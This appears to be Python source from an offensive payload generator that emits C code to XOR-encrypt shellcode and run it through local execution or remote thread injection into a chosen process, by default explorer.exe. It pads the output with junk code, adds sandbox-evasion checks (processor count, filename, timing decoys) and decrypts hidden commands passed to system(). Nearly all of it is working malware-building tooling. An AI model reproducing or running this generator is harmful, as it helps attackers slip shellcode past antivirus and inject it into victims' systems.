def local_thread_injection(vShellcode, decoder_stub, junkcode, intensity):
execs = core.varname_creator()
lti = decoder_stub
lti += junk.junk_inject(junkcode, "code", intensity)
lti += "\nvoid *" + execs + " = VirtualAlloc(0, sizeof " + vShellcode + ", MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
lti += junk.junk_inject(junkcode, "code", intensity)
lti += "memcpy(" + execs + ", " + vShellcode + ", sizeof " + vShellcode + ");\n"
lti += junk.junk_inject(junkcode, "code", intensity)
lti += "((void(*)())" + execs + ")();\n"
lti += "}\n"
return lti
def mono_core(junkcode, intensity):
evasion_funcname = "void " + core.varname_creator() + "(void)\n"
mem2 = core.varname_creator()
evasion_func = evasion_funcname
evasion_func += "{\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "LPVOID " + mem2 + "= NULL;\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += mem2 + " = VirtualAllocEx(GetCurrentProcess(), NULL, 1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "if (" + mem2 + " != NULL)\n"
evasion_func += "{\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += 'printf("' + core.varname_creator() + '");\n'
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += '}\n'
evasion_func += "else\n"
evasion_func += "{\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "exit(0);\n"
evasion_func += "}\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "}\n\n"
evasion_funcname = replace_string(evasion_funcname)
return evasion_funcname, evasion_func
def xor_encryption(shellcode, junkcode, intensity):
final_stub = findall('\\\\x([a-f0-9][a-f0-9])', shellcode)
shellcode_len = len(final_stub)
keylen = randrange(64, 128)
password = ''.join(choice(digits) for i in range(keylen))
vShellcode = core.varname_creator()
vShellcodelen = core.varname_creator()
vEshellcode = core.varname_creator()
vPassword = core.varname_creator()
vPasswordlen = core.varname_creator()
# Variables
final_stub = '\nint enc_shellcode[] = { ' + ', '.join([
str(int(code, 16) ^ ord(password[(i % len(password))]))
for i, code in enumerate(final_stub)
]) + ' };\n'
final_stub += junk.junk_inject(junkcode, "code", intensity)
final_stub = final_stub.replace("enc_shellcode", vEshellcode)
final_stub += 'int ' + vShellcodelen + f' = {shellcode_len};\n'
final_stub += junk.junk_inject(junkcode, "code", intensity)
final_stub += 'char ' + vPassword + f'[] = "{password}";\n'
final_stub += junk.junk_inject(junkcode, "code", intensity)
final_stub += 'int ' + vPasswordlen + f'= {len(password)};\n'
final_stub += junk.junk_inject(junkcode, "code", intensity)
# Decoder stub
final_stub += "unsigned char " + vShellcode + "[" + vShellcodelen + "];\n"
final_stub += junk.junk_inject(junkcode, "code", intensity)
final_stub += "for(int i = 0; i < " + vShellcodelen + "; i++) {\n"
final_stub += junk.junk_inject(junkcode, "code", intensity)
final_stub += vShellcode + "[i] = (char) " + vEshellcode + "[i] ^ " + vPassword + "[i % " + vPasswordlen + "];\n}\n"
final_stub += junk.junk_inject(junkcode, "code", intensity)
return vShellcode, final_stub
def shuffle_funcname(top_funcname_code, junkcode, intensity):
top_funcname_code = top_funcname_code.splitlines()
shuffle(top_funcname_code)
new_line = ""
for line in top_funcname_code:
line += "\n"
new_line += line
if junkcode == "yes":
new_line += junk.junk_inject(junkcode, "code", intensity)
return new_line
def my_name_is(filename, junkcode, intensity):
evasion_funcname = "void " + core.varname_creator() + "(char *args)\n"
b = core.varname_creator()
filename = filename.replace('output/', '')
evasion_func = evasion_funcname
evasion_func += "{\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += 'if (strstr(args, "' + filename + '") > 0)\n'
evasion_func += "{\n"
evasion_func += "int " + b + " = 0;\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "}\n"
evasion_func += "else"
evasion_func += "{\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "exit(0);\n"
evasion_func += "}\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "}\n\n"
evasion_funcname = evasion_funcname.replace("(char *args)", "(argv[0])")
evasion_funcname = replace_string(evasion_funcname)
return evasion_funcname, evasion_func
def number_of_core(junkcode, intensity):
evasion_funcname = "void " + core.varname_creator() + "(void)\n"
sysguide = core.varname_creator()
xcore = core.varname_creator()
evasion_func = evasion_funcname
evasion_func += "{\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "SYSTEM_INFO " + sysguide + ";\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "GetSystemInfo(&" + sysguide + ");\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "int " + xcore + " = " + sysguide + ".dwNumberOfProcessors;\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "if (" + xcore + " < 2)\n"
evasion_func += "{\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "exit(0);\n"
evasion_func += "}\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "}\n\n"
evasion_funcname = replace_string(evasion_funcname)
return evasion_funcname, evasion_func
def exercise_room(injection_type, processname, vShellcode, decoder_stub,
architecture, junkcode, intensity, evasions, decoys,
windows_firewall, windows_update, filename):
exec_code = ""
evasion_code = ""
junkfunc_code = ""
top_funcname_code = ""
evasion_funcname, evasion_func = evasion.the_great_evasion(
evasions, architecture, filename, junkcode, intensity)
junkfuncname, junkcode_func = junk.junk_inject(junkcode, "func", intensity)
decoy_code = decoy.fake_u(decoys, junkcode, intensity)
xor_func, exec_stub = postexploit.hidden_forever(windows_firewall,
windows_update, junkcode,
intensity)
final_code = ""
if injection_type == "local":
if junkcode == "yes":
junkfunc_code += junkcode_func
top_funcname_code += junkfuncname
core.junkcode_added()
core.junkfunc_added()
if evasions == "yes":
evasion_code += evasion_func
top_funcname_code += evasion_funcname
core.evasion_added()
exec_code += local_thread_injection(vShellcode, decoder_stub, junkcode,
intensity)
final_code += body_builder(evasion_code, junkfunc_code,
top_funcname_code, exec_code, decoy_code,
xor_func, exec_stub, junkcode, intensity)
elif injection_type == "remote":
if junkcode == "yes":
junkfunc_code += junkcode_func
top_funcname_code += junkfuncname
core.junkcode_added()
core.junkfunc_added()
if evasions == "yes":
evasion_code += evasion_func
top_funcname_code += evasion_funcname
core.evasion_added()
if processname != "":
exec_code += remote_thread_injection(processname, vShellcode,
decoder_stub, junkcode,
intensity)
final_code += body_builder(evasion_code, junkfunc_code,
top_funcname_code, exec_code,
decoy_code, xor_func, exec_stub,
junkcode, intensity)
else:
processname = "explorer.exe"
exec_code += remote_thread_injection(processname, vShellcode,
decoder_stub, junkcode,
intensity)
final_code += body_builder(evasion_code, junkfunc_code,
top_funcname_code, exec_code,
decoy_code, xor_func, exec_stub,
junkcode, intensity)
return final_code
def remote_thread_injection(processname, vShellcode, decoder_stub, junkcode,
intensity):
entry = core.varname_creator()
snapshot = core.varname_creator()
process_handle = core.varname_creator()
remote_thread = core.varname_creator()
remote_buffer = core.varname_creator()
rti = decoder_stub
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "\nPROCESSENTRY32 " + entry + ";\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += entry + ".dwSize = sizeof(PROCESSENTRY32);\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "HANDLE " + snapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "if (Process32First(" + snapshot + ", &" + entry + ") == TRUE)\n"
rti += "{\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "while (Process32Next(" + snapshot + ", &" + entry + ") == TRUE)\n"
rti += "{\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += 'if (stricmp(' + entry + '.szExeFile, ' + '"' + processname + '"' + ') == 0)'
rti += '{\n'
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "HANDLE " + process_handle + ";\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "HANDLE " + remote_thread + ";\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "PVOID " + remote_buffer + ";\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += process_handle + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE, " + entry + ".th32ProcessID);\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += remote_buffer + " = VirtualAllocEx(" + process_handle + ", NULL, sizeof " + vShellcode + ", (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "WriteProcessMemory(" + process_handle + ", " + remote_buffer + ", " + vShellcode + ", sizeof " + vShellcode + ", NULL);\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += remote_thread + " = CreateRemoteThread(" + process_handle + ", NULL, 0, (LPTHREAD_START_ROUTINE)" + remote_buffer + ", NULL, 0, NULL);\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "CloseHandle(" + process_handle + ");}}}\n"
rti += "CloseHandle(" + snapshot + ");"
rti += "}\n"
return rti
def encrypt_exec(commands, junkcode, intensity):
# Decryptor
func_name = core.varname_creator()
arg_command = core.varname_creator()
arg_key = core.varname_creator()
arg_command_lenght = core.varname_creator()
arg_key_lenght = core.varname_creator()
arg_exec = core.varname_creator()
i = core.varname_creator()
func_stub = "void " + func_name + "(int " + arg_command + "[], int " + arg_key + "[], int " + arg_command_lenght + ", int " + arg_key_lenght + ", char " + arg_exec + "[])\n"
func_stub += "{\n"
func_stub += junk.junk_inject(junkcode, "code", intensity)
func_stub += "for(int " + i + " = 0; " + i + "< " + arg_command_lenght + "; " + i + "++)"
func_stub += "{\n"
func_stub += junk.junk_inject(junkcode, "code", intensity)
func_stub += arg_exec + "[" + i + "] = " + arg_command + "[" + i + "] ^ " + arg_key + "[" + i + " % " + arg_key_lenght + "];\n"
func_stub += junk.junk_inject(junkcode, "code", intensity)
func_stub += "}\n"
func_stub += junk.junk_inject(junkcode, "code", intensity)
func_stub += arg_exec + "[" + arg_command_lenght + "] = 0;\n"
func_stub += junk.junk_inject(junkcode, "code", intensity)
func_stub += "}\n"
keylen = randrange(1024, 4096)
key = ''.join(choice(digits) for i in range(keylen))
cmd = list()
for command in commands:
cmd.append(xor_encrypt(command, key))
vKeylen = core.varname_creator()
vKey = core.varname_creator()
vNumcommands = core.varname_creator()
vSizeofcommands = core.varname_creator()
vMaxcommandsize = core.varname_creator()
vCommands = core.varname_creator()
vExeccommands = core.varname_creator()
i = core.varname_creator()
code = "int " + vKeylen + f" = {len(key)};\n"
code += junk.junk_inject(junkcode, "code", intensity)
code += "int " + vKey + f"[] = {{{str([ord(k) for k in key])[1:-1]}}};\n"
code += junk.junk_inject(junkcode, "code", intensity)
code += "int " + vNumcommands + f" = {len(commands)};\n"
code += junk.junk_inject(junkcode, "code", intensity)
code += "int " + vSizeofcommands + f"[] = {{{', '.join([str(len(data)) for data in cmd])}}};\n"
code += junk.junk_inject(junkcode, "code", intensity)
max_length = max([len(data) for data in cmd])
code += "int " + vMaxcommandsize + f" = {max_length};\n"
code += junk.junk_inject(junkcode, "code", intensity)
code += "int " + vCommands + f"[][{max_length}] = {{{', '.join(['{' + str(cmds)[1:-1] + '}' for cmds in cmd])}}};\n"
code += junk.junk_inject(junkcode, "code", intensity)
code += "char " + vExeccommands + "[" + vNumcommands + "][" + vMaxcommandsize + " + 1];\n"
code += junk.junk_inject(junkcode, "code", intensity)
code += "for(int " + i + " = 0; " + i + " < " + vNumcommands + "; " + i + "++)\n"
code += "{\n"
code += junk.junk_inject(junkcode, "code", intensity)
code += func_name + "(" + vCommands + "[" + i + "], " + vKey + ", " + vSizeofcommands + "[" + i + "], " + vKeylen + ", " + vExeccommands + "[" + i + "]);\n"
code += junk.junk_inject(junkcode, "code", intensity)
code += "system(" + vExeccommands + "[" + i + "]);"
code += junk.junk_inject(junkcode, "code", intensity)
code += "}\n"
return func_stub, code
def fake_u(value, junkcode, intensity):
number_of_decoy = value
if number_of_decoy != "":
transform_to_int = int(number_of_decoy)
number_of_decoy = 0
decoy_code = ""
while number_of_decoy != transform_to_int:
number_of_decoy += 1
memdmp1 = core.varname_creator()
tac1 = core.varname_creator()
tick1 = core.varname_creator()
memdmp1_value = str(random.randint(30000000, 330000000))
decoy_code += "char * " + memdmp1 + "= NULL;\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += memdmp1 + " = (char *)malloc(" + memdmp1_value + ");\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "if (" + memdmp1 + " != NULL)\n"
decoy_code += "{\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "memset(" + memdmp1 + ", 00, " + memdmp1_value + ");\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "}\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "int " + tick1 + " = GetTickCount();\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "Sleep(1000);\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "int " + tac1 + " = GetTickCount();\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "if ((" + tac1 + " - " + tick1 + ") < 1000)\n"
decoy_code += "{\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "exit(0);\n"
decoy_code += "}\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "free(" + memdmp1 + ");\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
core.decoy_added()
return decoy_code
elif number_of_decoy == "":
return ""
